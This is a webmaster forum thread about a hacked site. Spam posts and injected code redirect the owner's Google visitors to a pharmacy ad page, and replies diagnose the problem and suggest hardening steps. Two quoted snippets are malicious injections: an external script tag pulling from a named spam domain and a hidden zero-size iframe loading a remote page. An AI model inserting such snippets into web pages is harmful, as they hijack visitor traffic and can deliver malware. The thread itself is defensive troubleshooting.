SICK PIECE OF SHIT KEEPS HACKING MY SITE!!!

Status
Not open for further replies.

crossfittn

Afro Blue
Feb 4, 2007
1,135
8
0
TN
topyc.io
OK guys I'm really trying hard to figure this one out but if you go to google and type Phentermine, then click on the listing for PhenForum.com, he's got it so my site redirects to like... e-topps.info with a pharmacy PPC page. :(

phentermine - Google Search

BUT if I type my URL in directly it doesn't do it. So, he's only stealing my Google traffic.

I've tried uploading my backup .htaccess, backup index.php, etc, but it doesn't work. I tried uploading a plain index.html with some text on it, and that DID stop the redirection. So it seems he's hacked my CMS somehow.

I'm really freaking out right now. Can someone help me? Thank you so much!!!!!!
 


EDIT: Skip to #4 first.

#1 - immediately add an htaccess user/pass to protect your CMS login area.

#2 - log in and change your passwords, make sure you are the only admin set up.

#3 - make sure you don't have an injected javascript bit punched into your index.php (look at the source, near the bottom)

#4 - I found your problem. Someone has posted a javascript link, do you have HTML enabled for posts (a BIG no no)?Tthey are redirecting your traffic via a comment/post:
<.script src="http://e-topps.info/j_pharma.js".>

delete that post from the database and it will fix, and TURN OFF html commenting/posting.
 
WOW Thank you ! Where did you find that injected post? I thought i had HTML disabled for posts but I may have missed one usergroup. I just deleted that post in my forum from "Barbarastrac" that said "hi i started today"

It seems to be ok now so that must be the one.

You're great for finding that man. Thank you for putting in the effort to solve the case!!!!!!!!!!!!!!! How the heck can I give you some good rep?
 
I found it by using CTRL+U really quick to look at the source code before it redirected (I just searched the code for "topps"). Definitely go through and make sure HTML posting is turned off for all user groups/commenting, I even turn it off for admin on my forums.

Good luck!
 
Was this in your database or was it on a page? Only I have had some tosser giving me the same sort of trouble. Checking the permissions of your pages can help prevent further, I also changed passwords for the account.

I hope this is the last you see of this parasite ...
 
I still got hassle with this shit. I thought I had gotten rid of the parasite but today I had 6 index pages with
<iframe src='http://fuckingvirusdomain.ru/sta/iframe.php' width='0' height='0' style='visibility: hidden;'></iframe>domain changed to protect!
put onto it. It seems to have only targetted index.php pages so I am guessing something is planted on my server.

I have looked over my server but see nothing I am going to call someone in as the server management I have I think will brush it aside. On webhostingtalk.com if you search in this forum for iframe you'll see we are not alone Technical & Security Issues - WebHostingTalk Forums
Take a look @ this one
Strange code inserted into HTML Pages by WebServer - WebHostingTalk Forums
 
I still got hassle with this shit. I thought I had gotten rid of the parasite but today I had 6 index pages with put onto it. It seems to have only targetted index.php pages so I am guessing something is planted on my server.

I have looked over my server but see nothing I am going to call someone in as the server management I have I think will brush it aside. On webhostingtalk.com if you search in this forum for iframe you'll see we are not alone Technical & Security Issues - WebHostingTalk Forums
Take a look @ this one
Strange code inserted into HTML Pages by WebServer - WebHostingTalk Forums

There are various ways for hack/script kiddies to do this. Check my #2 post in this thread to start.

Also, if you are running "stock" scripts like PHPNews, Cutenews or any one of thousands of scripts out there that are open source, make sure they are 100% up to date (even though sometimes that doesn't even help). If you have a combo of an unprotected admin login area, with an outdated News script, etc. then you're ripe for hacking.

Also another culprit could be outdated/unsecured mailing list signup areas/login areas. I personally was a dork and had this happen to me. A punk was accessing through one of those and injecting a javascript bit into the footer of my index page.

What I have started doing recently is not using those open source news scripts etc. as the more something like that is used, the more of a target hackers/script kiddies will consider it. There are even sites out there that, once they hack your page, they post and brag about it.

Revist my #2 post in this thread, and make sure to do those things. Also, make sure all your scripts are up to date, including any forum installs, etc.
 
  • Like
Reactions: photoads
Status
Not open for further replies.